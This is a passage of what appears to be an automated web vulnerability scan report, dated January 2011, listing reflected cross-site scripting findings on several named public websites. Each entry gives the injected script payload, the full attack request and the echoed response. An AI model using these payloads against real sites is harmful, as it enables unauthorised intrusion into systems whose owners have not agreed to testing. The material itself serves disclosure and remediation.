This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /display/~mgibson/Versions2d2f3"><img%20src%3da%20onerror%3dalert(1)>0bd872f1e4a HTTP/1.1
Host: www.adaptavist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:57:08 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1294804627741
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1B25C030B3F6240EA4F87D13372FB07A; Path=/
Via: 1.1 adaptavist.wiki.adaptavist.com
Vary: Accept-Encoding
Connection: close
Content-Length: 17629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout
...[SNIP]...
<a href="/display/~mgibson/Versions2d2f3"><img src=a onerror=alert(1)>0bd872f1e4a?atl_token=ZLRSx5Xr53&amp;decorator=printable" class="first" rel="nofollow">
...[SNIP]...

2.51. http://www.adaptavist.com/display/~mgibson/Versions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adaptavist.com
Path:   /display/~mgibson/Versions

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8e1d1--><script>alert(1)</script>33ddadb2638 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/~mgibson/Versions?8e1d1--><script>alert(1)</script>33ddadb2638=1 HTTP/1.1
Host: www.adaptavist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:56:57 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1294804616980
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=3C1C05E31C38B31126C2C8D04494118A; Path=/
Via: 1.1 adaptavist.wiki.adaptavist.com
Vary: Accept-Encoding
Connection: close
Content-Length: 18372

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: CLEANGLOBAL'
layoutId : 'CLEANGLOBAL'
spaceName : 'Mark Gibson'
currentURL : '/display/~mgibson/Versions?8e1d1--><script>alert(1)</script>33ddadb2638=1'
contextPath : ''
action name : '$themebuilder.getActionName($req)'
********* Builder data *********
adaptavist.builder.sitemeshPage: null
adaptavist.builder.helper: null
adaptavi
...[SNIP]...

2.52. http://www.adaptavist.com/display/~mgibson/Versions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adaptavist.com
Path:   /display/~mgibson/Versions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acca6"><script>alert(1)</script>66de5a7f8e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/~mgibson/Versions?acca6"><script>alert(1)</script>66de5a7f8e3=1 HTTP/1.1
Host: www.adaptavist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:56:54 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1294804615527
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=2EE2888AD77BD98EFBE9EBAAF965C43E; Path=/
Via: 1.1 adaptavist.wiki.adaptavist.com
Vary: Accept-Encoding
Connection: close
Content-Length: 18372

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout
...[SNIP]...
<a href="/display/~mgibson/Versions?atl_token=cx7hTe-V6r&amp;decorator=printable&amp;acca6"><script>alert(1)</script>66de5a7f8e3=1" class="first" rel="nofollow">
...[SNIP]...

2.53. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /2010/12/are-you-a-search-geek-prove-it/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2703"><script>alert(1)</script>8eab4e0b12b was submitted in the REST URL parameter 3. This input was echoed as d2703\"><script>alert(1)</script>8eab4e0b12b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2010/12/are-you-a-search-geek-prove-itd2703"><script>alert(1)</script>8eab4e0b12b/ HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:58:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 03:58:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/2010/12/are-you-a-search-geek-prove-itd2703\"><script>alert(1)</script>8eab4e0b12b/?print_friendly=1">
...[SNIP]...

2.54. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /sub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9b4b--><script>alert(1)</script>6dabd3bfced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sub/?e9b4b--><script>alert(1)</script>6dabd3bfced=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6773
Connection: close
Date: Wed, 12 Jan 2011 03:59:21 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<input type="hidden" name="url" value="?e9b4b--><script>alert(1)</script>6dabd3bfced=1" />
...[SNIP]...

2.55. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /sub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4668a"><script>alert(1)</script>ec46a8b51f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sub/?4668a"><script>alert(1)</script>ec46a8b51f=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6767
Connection: close
Date: Wed, 12 Jan 2011 03:59:20 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=?4668a"><script>alert(1)</script>ec46a8b51f=1">
...[SNIP]...

2.56. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /sub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 49027<script>alert(1)</script>f043160c0aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sub/?49027<script>alert(1)</script>f043160c0aa=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6764
Connection: close
Date: Wed, 12 Jan 2011 03:59:20 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<p>Click here to subscribe to ?49027<script>alert(1)</script>f043160c0aa=1</p>
...[SNIP]...

2.57. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brothercake.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b1b"><script>alert(1)</script>00b1d85d25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85b1b\"><script>alert(1)</script>00b1d85d25e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?85b1b"><script>alert(1)</script>00b1d85d25e=1 HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:59:18 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=45ba14ccaaeba66d9616c468531f8e3f; path=/
Connection: close
Content-Type: text/html
Content-Length: 20228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta http
...[SNIP]...
<form id="stylesForm" action="/?85b1b\"><script>alert(1)</script>00b1d85d25e=1" method="post">
...[SNIP]...

2.58. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 207c2'-alert(1)-'f03d0d0c054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645207c2'-alert(1)-'f03d0d0c054/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=572mvl2jhv86t5062ssjht5jo1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
ext/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645207c2'-alert(1)-'f03d0d0c054/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.59. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47943"><a>24de7b9386b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/?47943"><a>24de7b9386b=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=86jc5ujusuh7fcahe88dfim9m3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/?47943"><a>24de7b9386b=1/" />
...[SNIP]...

2.60. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7991'-alert(1)-'c6ce8aabdb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/?e7991'-alert(1)-'c6ce8aabdb4=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=jaao4iculrkr23rlqg4spu8791; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
t/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/?e7991'-alert(1)-'c6ce8aabdb4=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.61. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /college-physical-activity-decrease-101109-0709/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa22'-alert(1)-'94bd4f005c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /college-physical-activity-decrease-101109-07092aa22'-alert(1)-'94bd4f005c2/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=hp8hsrpecvgqo4771na2bhsh52; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48166

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-07092aa22'-alert(1)-'94bd4f005c2/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.62. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /college-physical-activity-decrease-101109-0709/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11368'-alert(1)-'acaee121426 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /college-physical-activity-decrease-101109-0709/?11368'-alert(1)-'acaee121426=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=cs1a5g5u7od7fuc1m8k3aui056; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/?11368'-alert(1)-'acaee121426=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.63. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /college-physical-activity-decrease-101109-0709/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16b67"><a>7a08cab2e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /college-physical-activity-decrease-101109-0709/?16b67"><a>7a08cab2e83=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=j2gmf6n0c7m4cepimj8b6r1i87; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44361

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/?16b67"><a>7a08cab2e83=1/" />
...[SNIP]...

2.64. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /desk-jobs-possibly-increase-weight-gain-0508/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b53a5'-alert(1)-'f0bc0ecc581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desk-jobs-possibly-increase-weight-gain-0508b53a5'-alert(1)-'f0bc0ecc581/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=mirq2vtenseofonsdg0l9mjda6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48162

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508b53a5'-alert(1)-'f0bc0ecc581/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.65. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /desk-jobs-possibly-increase-weight-gain-0508/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61080'-alert(1)-'63053a0624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desk-jobs-possibly-increase-weight-gain-0508/?61080'-alert(1)-'63053a0624=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=d4qnjluc2uspdahh58q9tujla5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42656

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
